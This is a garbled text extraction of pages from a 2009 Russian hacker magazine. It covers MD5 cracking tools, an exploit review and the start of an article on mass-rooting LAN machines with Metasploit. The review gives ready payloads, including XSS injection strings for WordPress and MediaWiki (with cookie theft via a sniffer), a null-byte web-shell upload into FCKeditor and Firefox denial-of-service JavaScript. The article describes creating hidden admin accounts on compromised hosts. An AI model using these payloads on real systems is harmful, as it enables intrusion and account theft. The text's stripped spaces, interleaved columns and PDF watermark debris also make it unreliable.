Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

128_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

16.61 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 45 / 155 6 7 8 9 10 11 12 13 14 15 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
взломw				to	BUY
w Click				to
w Click										m
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

какого-либоразработчика), будутотправленынаGoogle. Ещепример:

# настройки «allow/deny» .htaccess-файла <limit GET>

satisfy any order deny,allow deny from all

allow from 63.76.22.2 allow from 130.116.16. allow from 130.116.17.

allow from 130.116.18. allow from 130.116.19. allow from 144.110.36. require valid-user </limit>

Еслисредитвоихдрузейнайдутсятолковыепрограммисты, можешь посоветоватьсясниминатемунаписанияинжекторапакетов, гдеадрес отправителяподменялсябынавводимыйвручную. Дляэтогообязательнопонадобитсядополнение— библиотека, вродеWinpcap илиLibInject.

	№6	ЗАДАЧА: МАКСИМАЛЬНОБЫСТ-	if ($connect->content =~ /Cleartext of $hash is (.*)/)
		РОРАСШИФРОВАТЬMD5, ЕСЛИ	{
		НЕХВАТАЕТВЫЧИСЛИТЕЛЬНЫХ	print "Result : $1\n";
МОЩНОСТЕЙУКОМПА			} else {
			print "Result : Hash not found!\n";
РЕШЕНИЕ:			}

Небеда! Сломаешьбанк— купишьновыйкомп. Аеслисерьезно, длярешениязадачиможновоспользоватьсясуществующимисерверамидлявзломаизвестных криптографическиххешейонлайн. Скажем, одинизнаиболееизвестныхрусскоязычных— Hashcracking.info. Насамомделе, ихможноперечислятьдесятками, простоневсеэффективны, потомучтонаодномискомыйпарольможетбыть, ана другомнет. Дляэтогостоитвоспользоватьсяспециальнымсофтомподназванием HashSearcher. Авторсофтины— mailbrush. Программаосуществляетавтоматизированныйпоискпо15 сервисамдляMD5-крекинга. Вотнекоторыеизних: hashcracking.info, md5.rednoize.com, tmto.org, md5pass.info, milw0rm. com. Вбивайхеш, запускайпрогуиждирезультата! Еслихочешь, можешьсам попробоватьнаписатьсредствосвоимисилами. Примервзаимодействиясодним изтакихсервисовнаPerl:

$url = "http://md5.hashcracking.com/search.php?md5=$hash»;
$lwp = LWP::UserAgent->new();
$lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en;
rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
$connect = $lwp -> get($url);
print «md5.hashcracking.com	---- «;	Проспуфитьадресисточникапрощепаренойрепы!

№7 ЗАДАЧА: СГЕНЕРИРОВАТЬБОЛЬ-

ШУЮRAINBOW TABLE, ИСПОЛЬЗУЯ GPU

РЕШЕНИЕ:

Идеяясна— тыхочешь, используямощисвоейвидеокарты, быстрее генерировать«радужныетаблицы» дляатакинакриптографические хеши, асредствадляэтогоднемсогнемненайти, потомучтосуществующиепроекты, вродеwinrtgen, работаютисключительнонамощностях процессоров. ДлявзаимодействиясGPU тебенужновоспользоваться специальноймодификацией, авторомкоторыйявляетсяZhu Shuanglei. Найтитакую(rtgen CUDA) исамосредстводлявзломаможнонасайте project-rainbowcrack.com. ТакаяжетемаестьотнашегосоотечественникаXSerg. Разберемработунапримерепервой:

# синтаксис ничем не отличается от привычной тулзы, кроме того, что тебе потребуется указать количество ядер видеокарты, которые будут задействованы в работе RainbowTableGenerate.exe md5 alpha 1 8 0 2400 40000000 xek 240

Теперьобъяснюпараметрыподробнее:

• Md5 — генерациясоответствующеготипахеша;

•alpha — толькобуквы;

•1 8 — искомыйпарольотодногодовосьмисимволов;

•0 — индекс;

•2400 40000000 — длинацепочки;

•xek — префиксдлятаблицы;

•240 — количествозадействованныхядервидеокарты. Уменя— GeForce

••GTX 280. Ихколичестворавно240 соответственно.

Дляизвестныхвидеокартпоследняяопцияданавсправочномварианте.z

Автоматизированныйпоиск
кудаболееудобноезанятие, чем
использованиесобственных	РаботасCUDA пригенерации
вычислительныхмощностейдля	РаботасCUDA пригенерации
взломапростейшегохеша	«радужныхтаблиц»

XÀÊÅÐ 08 /128/ 09

039

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
w Click					BUY				>>m
w Click				to					>>m


w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

взлом

обзор	обзор
эксплоитов	эксплоитов

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

		обзор
		эксплоитов
		обзор
		эксплоитов
	МАГ (ICQ 884888)	обзор
	МАГ (ICQ 884888)	эксплоитов
	/ HTTP://WAP-CHAT.RU /	эксплоитов
	/ HTTP://WAP-CHAT.RU /
	OBZOR ЕKSPLOITOV

Жаркийавгустпрямо-такиплавитуставшиемозгиразработчиков. Хакерыже, наоборот, прилагаютвсебольшеибольшеусилийдляпоисказнаменательныхуязвимостейвсамыхразличныхприложениях. Вотисегодняшнийобзорпорадуетсвежимурожаембаговвтакихиз-

вестнейшихпродуктах, какWordPress, MediaWiki, Mozilla Firefox, MS Internet Explorer вместескомпонентамиMS Office, атакжевцелойкуче web cms, вкоторыхиспользуетсяWYSIWYG-редакторFCKeditor.

01НЕДОСТАТОЧНАЯПРОВЕРКА ПРИВИЛЕГИЙВWORDPRESS

>>Brief

ПоискдырвизвестнейшейблоговойплатформеWordPress становится длямногихуженепростоувлекательнымзанятием, ноисамымнастоящимхобби. ВотинаэтотразребятаизCore Security Technologies (http:// www.coresecurity.com/corelabs) обнаружили, чтодвижокнекорректно проверяетправадоступаунепривилегированныхпользователейпри просмотре(атакжередактированииисохранении) страницконфигурации самыхразличныхплагинов. Удаленныйавторизованныйпользователь можетлегковнедритьсвойXSS-кодвконфигиплагинов, атакжепросмотретьдругуючувствительнуюинформацию.

Редактированиеопцийплагиновобычнопроходитчерезсценарий ./

wp-admin/options-general.php?page=[plugin_page], вкотором спроверкойпривилегийвсенормально. Нониктонеотменялобращение напрямуюк./wp-admin/admin.php, которыйиотвечаетзаинклудплагинов. Дляпониманияуязвимостирассмотримкодэтогоскриптаподробней:

//проверка того, что страница плагина находится в своей директории ./wp-content/plugins

if (isset($_GET['page']))

{

$plugin_page = stripslashes($_GET['page']); $plugin_page = plugin_basename($plugin_page);

}

...

// Handle plugin admin pages. if (isset($plugin_page))

{

if ( validate_file($plugin_page) )

{

wp_die(__('Invalid plugin page'));

}

if (! ( file_exists(WP_PLUGIN_DIR . "/$plugin_ page") && is_file(WP_PLUGIN_DIR . "/$plugin_page") ) )

wp_die(sprintf(__('Cannot load %s.'), htmlentities($plugin_page)));

do_action('load-' . $plugin_page); //собственно, инклуд страницы плагина include(WP_PLUGIN_DIR . "/$plugin_page");

}

...

Каквидно, валидациюпроходяттолькофизическирасположенныена жесткомдискефайлыплагина. Никакихпроверокнаправадоступакним нетивпомине.

>>Targets

WordPress 2.8 иниже. WordPress MU 2.7.1 иниже.

>>Exploit

Впримереавторыприводятследующиевекторыиспользования: 1. ПросмотрконфигурацииплагинаCollapsing Archives:

http://[some_wordpress_blog]/wp-admin/admin.php?page=/ collapsing-archives/options.txt

2.Просмотринформацииобантиспам-плагинеAkismet, идущемвдефол-

тномдистрибутивевордпресса:

http://[some_wordpress_blog]/wp-admin/admin. php?page=akismet/readme.txt

3.XSS вплагинеRelated Ways To Take Action:

040		XÀÊÅÐ 08 /128/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

обзор	обзор
эксплоитов	эксплоитов

обзор

эксплоитов

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
взломw				to	BUY
w Click				to
w Click									o	m
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

http://[some_wordpress_blog]/wp-admin/admin. php?page=related-ways-to-take-action/options.php

Дляиспользованиябагавставляемвполе«Exclude actions by term» код:

\"/><script>alert(String.fromCharCode(88)+String.

fromCharCode(83)+String.fromCharCode(83))</

script><ahref="

4.ПросмотрDashboard-плагинаWP Security Scanner:

http://[some_wordpress_blog]/wp-admin/admin. php?page=wp-security-scan/securityscan.php

5.РеконфигурацияплагинаIntrusion Detection System:

http://[some_wordpress_blog]/wp-admin/index. php?page=wp-ids/ids-admin.php

Оригинальныйтекстadvisory ищипоссылкеhttp://milw0rm.com/ exploits/9110.

>> SOLUTION

Самымлучшимрешениемдляустраненияуязвимостибудетобновление своегоблогадопоследнейверсии, представленнойнаwordpress.com (на данныймомент— 2.8.1).

02ЗАГРУЗКАПРОИЗВОЛЬНЫХ ФАЙЛОВВFCKEDITOR

>> Brief

FCKeditor, нарядусTinyMCE, являетсяоднимизнаиболеераспространен- ныхWYSIWYG-редакторовииспользуетсявтакихизвестныхWEB-прило-

женияx, какZope, PHPList, Falt4 CMS, RunCMS, Dokeos, Nuke ET.

ДляэтойуязвимостивСетиприсутствуюточеньскудныеописания, из которыхпонятнотолькото, чтоуязвимпараметр«CurrentFolder» (напри-

мер, www.securitylab.ru/vulnerability/382191.php иwww.securityfocus. com/bid/31812). Таккактакоеположениеделменявовсенеустраивало, пришлосьсамомупокопатьсявисходникахописываемогоHTML based редактора.

Итак, качаемпоследнийуязвимыйрелиз(http://dfn.dl.sourceforge.net/ sourceforge/fckeditor/FCKeditor_2.6.4.zip) иоткрываемсценарий, ответст-

венныйзаupload файловвовстроенномфайлменеджерескрипта— ./ editor/filemanager/connectors/php/upload.php:

<?php

...

$sCurrentFolder = GetCurrentFolder() ;

// Is enabled the upload?

if ( ! IsAllowedCommand( $sCommand ) )

ДОМАШНЯЯСТРАНИЦАПРОЕКТАMEDIAWIKI

SendUploadResults( '1', '', '',

'The ""' . $sCommand .'"" command isn\'t allowed' ); // Check if it is an allowed type.

if ( !IsAllowedType( $sType ) ) SendUploadResults( 1, '', '',

'Invalid type specified' );

FileUpload( $sType, $sCurrentFolder, $sCommand ) ?>

Здесьнасинтересуетфункцияопределениятекущейдиректории— GetCurrentFolder(), найтикоторуюмысможемвсценарии./editor/ filemanager/connectors/php/io.php:

function GetCurrentFolder()

{

if (!isset($_GET)) { global $_GET;

}

$sCurrentFolder = isset( $_GET['CurrentFolder'] )? $_GET['CurrentFolder'] : '/' ;

// Check the current folder syntax (must begin and start with a slash).

if ( !preg_match( '|/$|', $sCurrentFolder ) ) $sCurrentFolder .= '/' ;

if ( strpos( $sCurrentFolder, '/' ) !== 0 ) $sCurrentFolder = '/' . $sCurrentFolder ;

// Ensure the folder path has no double-slashes while ( strpos ($sCurrentFolder, '//') !== false )

{

$sCurrentFolder = str_replace ( '//','/', $sCurrentFolder) ;

}

// Check for invalid folder paths (..) if ( strpos( $sCurrentFolder, '..' ) ||

strpos( $sCurrentFolder, "\\" )) SendError( 102, '' ) ;

return $sCurrentFolder ;

}

Атакжефункция, собственно, загрузкиисохраненияфайловFileUpload()

из./editor/filemanager/connectors/php/commands.php:

function FileUpload(

$resourceType, $currentFolder, $sCommand )

{

...

//Map the virtual path to the local server path. $sServerDir = ServerMapFolder($resourceType,

$currentFolder, $sCommand ) ;

//Get the uploaded file name.

$sFileName = $oFile['name'] ;

$sFileName = SanitizeFileName( $sFileName );

...

$sFilePath = $sServerDir . $sFileName ;

ЧИТАЕМAKISMET/README.TXT ЧЕРЕЗБАГУВWORDPRESS

XÀÊÅÐ 08 /128/ 09

041

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY				>>m
w Click				to	BUY					взлом
w Click				to						взлом
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

обзор	обзор
эксплоитов	эксплоитов

					hang		e
				C			e	E
			X					E
		-							d
		F								t
		D								i
		D								r
	P						NOW!			o
	P
						BUY
обзор					to	BUY
					to
	w										m
	w Click										m
эксплоитов										o
		w								o
		.							.c
			p					g
				df			n		e
					-x cha

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

CALC.EXE, ВЫЗВАННЫЙЧЕРЕЗПЕРЕПОЛНЕНИЕВFIREFOX’Е

...

move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;

...

}

ФункцияServerMapFolder() простовозвращаетполныйfolder path на сервере, исходяизпереданногопараметра$currentFolder. Каквидно изфункцииGetCurrentFolder(), имяуказываемойпользователемпапки проверяетсятольконаналичиеуязвимостиdirectory traversal, ноникакне набанальныйnull-byte.

>>Exploit

Длянаглядногопримераэксплуатациивоспользуемсявстроенным тестовымстендомFCKeditor длязагрузкифайлов— ./editor/filemanager/ connectors/uploadtest.html.

Итак, всписке«Select the File Uploader to use» выбираемPHP (ну, или любойдругойпонравившийсятебеконнектор), далеевформе«Upload a new file» выбирайсвойшелл, сохраненныйсрасширением.txt и, наконец,

вполе«Current Folder» вбивайчто-товроде«my-evil-shell.php%00».

Теперь, послесабмитазаполненнойформы, скриптсрадостьюпокажет адрествоегозагруженногошеллавполе«Uploaded File URL» (вмоем случаеэто./userfiles/test.php).

Каквидноизпримера, $sFilePath дляmove_uploaded_file() становится равнымименидиректории($sServerDir), настоящеежеимяфайла ($sFileName) просто-напростоотбрасываетсянулл-байтом.

>>Targets:

FCKeditor <=2.6.4, атакжевсеweb cms, вкоторыхиспользуетсяэтот

WYSIWYG-редактор.

>> Solution

Каквсегда, наилучшимрешениемдлязакрытияуязвимостибудетустановкапоследнейверсиискриптассайтапроизводителя— http://www. fckeditor.net.

03МЕЖСАЙТОВЫЙСКРИПТИНГВ

MEDIAWIKI

>>Brief

Да-да! ВдвижкеMediaWiki, которыйиспользуетсяВеликойиУжасной

УСПЕШНАЯЗАГРУЗКАШЕЛЛАВFCKEDITOR

Википедиейимножествомдругихвики-сайтов, некийAmalthea 13 июля сегогоданашелзамечательнуюXSS-уязвимость.

Багаприсутствуетвфайле./includes/specials/SpecialBlockip.php ипроявляетсянастраницеsite.com/index.php/Special:Block.

Итак, рассмотриммеханизмдействияподробнее:

<?php

...

class IPBlockForm

{

...

function IPBlockForm( $par )

{

global $wgRequest, $wgUser, $wgBlockAllowsUTEdit;

// получаем значение wpBlockAddress из массива $_REQUEST $this->BlockAddress = $wgRequest->getVal(

'wpBlockAddress', $wgRequest->getVal( 'ip', $par ) ); $this->BlockAddress = strtr(

$this->BlockAddress, '_', '' );

...

}

...

//функция для отображения элементов html-страницы function showForm( $err )

{

...

$user = User::newFromName( $this->BlockAddress );

...

// отображаем полученное

значение wpBlockAddress в веб-форме Xml::input( 'wpBlockAddress', 45,

$this->BlockAddress, array(

ВНЕШНИЙВИДFCKEDITOR

042		XÀÊÅÐ 08 /128/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

обзор	обзор	обзор
эксплоитов	эксплоитов	эксплоитов

					hang		e
				C			e	E
			X					E
		-							d
		F								t
		D								i
		D								r
	P						NOW!			o
	P
>> взломw Click						BUY
>> взломw Click					to	BUY					m
обзор					to
обзор	w
эксплоитов		w								o
		.							.c
			p					g
				df			n		e
					-x cha

CALC.EXE,ВЫЗВАННЫЙПЕРЕПОЛНЕНИЕМACTIVEX КОМПОНЕНТАВIE

ДЕМОНСТРАЦИЯРАБОТЫTUN KERNEL ЭКСПЛОЙТА

DENIAL OF SERVICE ВMOZILLA FIREFOX

'tabindex' => '1', 'id' => 'mw-bi-target',

'onchange' => 'updateBlockOptions()' ) ). " </td>

</tr>

<tr>"

);

...

}

...

ПеременнаяwpBlockAddress (азатеми$thisÆBlockAddress) нигдеини-

коимобразомнефильтруется, такчтонамостаетсялишьграмотнозаюзать этотзамечательныйфакт.

>>Exploit

Использоватьописаннуюуязвимостьмежсайтовогоскриптинганеобычайнопросто. Достаточнолишьскормитьадминистраторуилилюбому другомупривилегированномуучастникуВики-порталассылкувида:

http://site.com/index.php/Special:Block/?wpBlockAddre ss="/><script>alert('Privet! Ya MegaXSS :)')</script><a href="

ЕслиэтобудетXSS соссылкойнатвойснифер, тоавторизационныекукисыадминистратораблагополучноокажутсяутебя.

>>Targets

УязвимысразудвеветкиMediaWiki: MediaWiki <= 1.14.0

MediaWiki <= 1.15.0

>> Solution

Какобычно, незабываемпроверятьналичиесвежейверсиидвижкана сайтепроизводителя— mediawiki.org/wiki/Download.

04ПОВРЕЖДЕНИЕПАМЯТИВMOZILLA FIREFOX

>>Brief:

Чемпопулярнейстановитсясофт, тембольшеэнтузиастовнаходятвнем уязвимости. ПечальнымпримеромслужитнетакдавновышедшийFirefox 3.5, гденекийSBerry aka Simon Berry-Byrne нашелзамечательнуюбагу переполнениякучи, спомощьюкоторойзлоумышленникможетвыполнитьпроизвольныйкоднацелевойсистеме.

ПроблемазаключаетсявошибкевJust-in-Time (JIT, компиляторенового движкаJavaScript дляОгнелиса): приобработкеJavaScript’омнекоторых теговHTML (например, font) компиляторнекорректновозвращаетданные изсобственныхфункций, такихкакescape().

Кстати, темжеавтором, новсоавторствесAndrew Haynes быланайдена иещеоднопереполнение(теперьужевызывающееDenial of Service) в

свежемфайрфоксе— Mozilla Firefox 3.5 Unicode Data Remote Stack Buffer Overflow Vulnerability. Наэтотразбагазаключаетсявнекорректнойобра- боткедлинныхunicode-последовательностейвметодеwrite вышеозначенногодвижкаJS.

>>Targets

Firefox 3.5 и, возможно, болееранниеверсии.

>> Solution

Завсемиsecurity-апдейтамидляОгнелисаобращайсяпоадресуmozilla. com/firefox.

>> Exploit:

Дляпервогопереполненияавторпредоставляетнамвпользование неплохойPoC (http://milw0rm.com/exploits/9137), запускающийнатвоей машинеприложениеcalc.exe, адлявторогодостаточнолишьнакидать небольшойhtml-примерсиспользованиемjavascript:

<html>

<head>

var str2 = unescape("%u0000%u0000");

XÀÊÅÐ 08 /128/ 09

043

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY				>>m
w Click				to	BUY					взлом
w Click				to						взлом
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

обзор	обзор
эксплоитов	эксплоитов

hang

NOW!

BUY

обзор

w Click

эксплоитов

-x cha

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

XSS ВПЛАГИНЕRELATED WAYS TO TAKE ACTION

var finalstr2 = mul8(str2, 49000000); var finalstr = mul8(str, 21000000); document.write(finalstr2); document.write(finalstr);

function mul8 (str, num) {

var i = Math.ceil(Math.log(num) / Math.LN2), res = str;

do {

res += res; } while (0 < --i);

return res.slice(0, str.length * num);

}

</script>

</head>

<body>

</body>

</html>

Невызывающаяподозренийфункцияwrite() должна, поидее, вывестина экраноченьдлинныепоследовательностиunicode-символов. Новместо этогоFirefox зависнетистанеткушатьочень-оченьмногопамяти(такчто насвоеймашинетеститьсплойткрайненерекомендую).

05 ВЫПОЛНЕНИЕПРОИЗВОЛЬНОГО КОДАВMICROSOFT OFFICE WEB COMPONENTS SPREADSHEETACTIVEX

КОМПОНЕНТЕ

>>Brief:

Мелкомягкиескаждымднемвсебольшеибольшенасрадуют. Наэтотраз вполезренияпопалсплойтподосликаIE, основанныйнауязвимостив

Microsoft Office Web Components Spreadsheet ActiveX. СейславныйActiveX

компонентиспользуетсябраузеромInternet Explorer дляотображения электронныхтаблицExcel. Самабага, собственно, заключаетсявошибке припроверкеграницданныхвметодеmsDataSourceObject() вэтом компоненте(OWC 10 иOWC11). Приэксплуатацииуязвимости(например, спомощьювсемизвестногометодасiframe) злоумышленниклегкоможет вызватьпереполнениестекаивыполнитьпроизвольныйкоднацелевой системе. Инымисловами, еслитыиспользуешьвкачествебраузераIE, атакженатвоемкомпьютереприсутствуетнебезызвестныйMS Office, то твоясистемаподверженаопасности.

>> Exploits

Сразутривариацииэксплойтаподописаннуюбагутыможешьнайтипо адресуhttp://www.securitylab.ru/vulnerability/382430.php.

Такжедляуспешнойэксплуатацииуязвимостивтвоембраузередолжен бытьразрешенActiveX, вчастности, объекты«OWC10.Spreadsheet» и «OWC11.Spreadsheet».

>> Targets:

•Microsoft Office XP Service Pack 3;

•Microsoft Office 2003 Service Pack 3;

•Microsoft Office XP Web Components Service Pack 3;

•Microsoft Office Web Components 2003 Service Pack 3;

•Microsoft Office 2003 Web Components for the 2007 Microsoft Office system Service Pack 1;

•Microsoft Internet Security and Acceleration Server 2004 Standard Edition Service Pack 3;

•Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition Service Pack 3;

•Microsoft Internet Security and Acceleration Server 2006;

•Internet Security and Acceleration Server 2006 Supportability Update;

•Microsoft Internet Security and Acceleration Server 2006 Service Pack 1;

•Microsoft Office Small Business Accounting 2006.

>> Solution:

Каквсегда, Microsoft неторопитсяисправлятьсвоиграбли. Вкачестве временноймерыдляисправленияуязвимостирекомендуетсядеактивироватьследующиеCLSID:

{0002E541-0000-0000-C000-000000000046} {0002E559-0000-0000-C000-000000000046}

06 ПОВЫШЕНИЕПРИВИЛЕГИЙ ВЯДРЕLINUX

>>Brief:

17 июлясегогодаизвестныйэкспертпобезопасности*Nix-систем, автор модуляgrsecurity Brad Spengler опубликовалописаниеиPoC весьма необычногоэксплойтаподпоследниеядраLinux.

Необычнымявляетсято, чтоприанализеисходногокодаядраLinux эту багупрактическиневозможнообнаружитьневооруженнымглазом. Итак, уязвимыйкодкроетсявреализацииnet/tun из-заошибкиразымено- ваниянулевогоуказателявфункцииtun_chr_pool() файлаdrivers/net/tun.c:

		4440	XÀÊÅÐ 08 /128/ 09

hang

NOW!

BUY

обзор

w Click

эксплоитов

-xcha

XSS ВДВИЖКЕMEDIAWIKI

УМИРАЮЩИЙОГНЕЛИС

struct sock *sk = tun->sk; // initialize sk with tun->sk

...

if (!tun)

return POLLERR; // if tun is NULL return error

Объясню, чтоздесьпроисходит: сначалаинициализируетсянекая переменнаяsk иустанавливаетсявзначение, котороеможетбыть равнонулю. Затемзначениепеременнойпроверяетсятакимобразом, что, еслионоравнонулю, возвращаетсяошибка. Багапроявитсятолькопослекомпиляцииисходника,таккаквпроцессе оптимизацииэтогокодакомпиляторувидит,чтозначениеозначенной переменнойужедавноприсвоеноипростовырежетблоксif(!tun).

Такоенехитроезлодеяние, проведенноекомпилятором, позволитнам прочитатьизаписатьданныепоадресу0x00000000, которыйзатем можнобудетспокойноперенаправитьвпространствопользователя.

>> Exploits

ОпубликованныйБрэдомСпенглеромэксплойт, атакжевсеего комментариикэтойзнаменательнойбагенаанглийскомязыкеты можешьскачатьпоадресуhttp://milw0rm.com/exploits/9191.

>> Targets	:	Реклама
Linux kernel <= 2.6.30 (ядродолжнобытьсобраносопциейGCC
-fdelete-null-pointer-checks).

>> Solution:
ДляисправленияэтойидругихуязвимостейядраЛинуксанезабывай
регулярнопроверятьGIT-репозиторийпроизводителя: http://git.
kernel.org. z

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

XÀÊÅÐ 08 /128/ 09

hang

NOW!

BUY

>>m

w Click

взлом

-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

START

АВТОСПЛОЙТM0R0 / M0R0@INBOX.RU /

КАКОБРАЗЖИЗНИ

МАССРУТИНГ ВЛОКАЛЬНОЙ СЕТИ

Чтоделать, еслихочетсявсегоисразу, даещеиненапрягатьсяпри этом? Правильно, надонайтитого, ктосделаетвсезатебя. Так

ивхакпроме— нехочешьвыполнятьрутиннуюработу, используй средстваавтоматизации. Благо, естьMetasploit, голованаплечах

инемногофантазии.

>> взлом

Как-торазуменявозниклаидеясоздать	позволяябыстропроверитьмашинкии, по	калкеибылприятноудивлен. Болеечетверти
портативнуюверсиюметасплойта. Зачем?	возможности, ихполомать. Конечно, не0-day,	машинвыбросилирутовыешеллы.
Ну, представь, чтотыпоруталкакой-нибудь	нотемнеменее. Вобщем-то, еслинебрать	Ещебольшеобрадовалтотфакт, чтосам
узелвлокалкеизахотелосьтебеокинуть	врасчетустановкуnmap и, соответственно,	эксплойтмогбыбытьидругим. Толькоза
пристальнымвзглядомвсюсетьизнутри. Явно	winpcap, проблемссозданиемпортатив-	2009 годMicrosoft ужеопубликовалапорядка
нужнапомощьввидевсевозможныхx-tool'z,	нойсборкинебыло. Нотутянаткнулсяна	20 критическихуязвимостей. Однаизних—
которыенадоустановить, настроитьит.д. Они	EasyHack отSKVOZ (zзамай2009) — про	ms09-001 — такжесвязанасSMB. Эксплойта
начнутследитьивсяческигадитьвсистеме.	реализациюмассрутингаспомощьюметас-	поднеепоканет, но, возможно, этотолько
Вобщем, форменноепалево, хотявсезависит	плойта. Темаменядикозаинтересовала, ия	вопросвремени.
отконкретныхобстоятельств. Гораздокруче	решилееразвить.	Однаконевсетаксладко. Нарисовалосьне-
иметьпортативныеверсии, которыеможно	Честносказать, сметасплойтомядоэтого	сколькопроблем, которыетребовалирешения.
настроитьзаранееитупоскопироватьна	особенноинеработал. Так, баловалсяразными	Допустим, утебяестьшелл. Классикажанра
тачку. Есливсеправильносделать, нигдеони	сплойтами, недальшеuser guide. Ноидеямас-	требуетсозданияновогопользователяидобав-
тебяневыдадут, апоокончаниизлостных	срутингареальнозацепила. Болеетого, уменя	ленияеговлокальнуюгруппуадминистраторов
действийихнужнобудетпростоудалить.	былостойкоеощущение, чтопослеэпидемии	(илиснятияхешейпаролей, илипростозамены
МЕТАСПЛОЙТ— XP	conficker найтитачкисюзабельнойдыркой	паролялокальногоадмина). Вроссийских
МЕТАСПЛОЙТ— XP	проблематично. Напомню, чтоSKVOZ предла-	реалияхподавляющеебольшинствомашин
— MS08_067 — DB_UTOPWN	галиспользоватьсвязкуnmap иметасплойт	влокалке(яговорюоклиентскихтачкахпод
Вджентльменскомнаборепентестерамета-	какраздлямассрутингадырыMS08_067. Ради	WinXP) работаютподлокализованнойосью, а,
сплойтзанимаетотнюдьнепоследнееместо,	интересаяповторилэкспериментвсвоейло-	значит, локальнаягруппаноситназвание«Ад-

046	XÀÊÅÐ 08 /128/ 09

hang

NOW!

BUY

w Click

-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
взломw				to	BUY
w Click				to
w Click									o	m
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ГЕРОЙДНЯ— МЕТАСПЛОЙТC ЭКСПЛОЙТОМMS08_067

министраторы». Попробуйвбитьвудаленной	ВызовTraySetState спараметром2 блокирует	доступизконсоливвинде— совсемнетак
консоли«Администраторы» итебянакроет	появлениеиконкиAutoIT втрее. Далееопре-	крутокаквниксах, большинствоутилпросто
глубочайшеечувствообиды. Да-да, извечная	деляетсяимягруппыадминистраторов, созда-	небудутработатьбезграфики. Такчто, будем
проблемаскодировками. Консольработает	етсяпользовательидобавляетсявэтугруппу.	шаманитьвпопыткеоткрытьдоступкрабоче-
подcp866, Windows — подcp1251, никсыи	Последнийвызовмодифицируетреестр,	мустолу. Вариантов, впринципе, всегодва.
вовсеподKoi8-r илиUnicodе. Метасплойтже	чтобыпользовательотсутствовалвспискеин-	Это— расшариваниестола(типаRadmin, VNC
инагрузки, типаmeterpreter, впринципене	терактивноговходаXP. Компилируемскриптв	ит.д.) ииспользованиетерминальныхслужб.
понимаютрусскуюлокаль. Отсюданаровном	exe-файлипроверяемнавиртуалке. Есливсе	Первыйдляклиентскихмашин— совсеми
местемыполучаемнехилуюпроблему.	впорядке, двигаемсядальше.	невариант, ибооченьпалится. СRDP вXP
Всеткеэтатемадостаточноширокообсужда-	Вкачестветранспортапоначалуядумалис-	вообщетухло: приинициацииудаленного
ется. Вконечномитогевсессылаютсянаодин	пользоватьSMB. Мынаходимсявтойжесетке,	подключениялокальныйпользовательбудет
итотжепатч(trac.metasploit.com/ticket/253). Я	чтоижертва, — такпочемубынерасшаритьу	выброшенизактивнойсессии. Ноненадо
накладывалпатч, пробовалразныекодиров-	себяпапкуинеподложитьтудафайликuser.	отчаиваться, выходесть.
ки, ноничертанеполучилось. Может, полу-	exe? Невидяникакихпроблем, ятакипос-	РАЗРУШИТЕЛИЛЕГЕНД
читсяутебя, номеняэтапроблемаоконча-	тупил. Номонтированиепапкисудаленной	РАЗРУШИТЕЛИЛЕГЕНД
тельнодобила, иярешилискатьнормальное	системынивкакуюнеполучалось— видимо,	ЧемдумаютребятаизRedmond'а, янезнаю,
решение.	послеэксплуатациисервисначиналработать	нопоройихрешенияпоражаютвоображение.
СКАЖИМНЕ,	неправильно. Нудаладно, ввиндепоумолча-	ЕсливсерверныхОСмыимеемчеловеческий
СКАЖИМНЕ,	ниювстроенконсольныйклиентftp. Яподнял	доступпоRDP, товклиентских— полнаялажа.
КАКТЕБЯЗОВУТ	натачкеftp-сервер(портативныйFileZilla), на-	УдаленныйдоступвXP неуживаетсяслокаль-
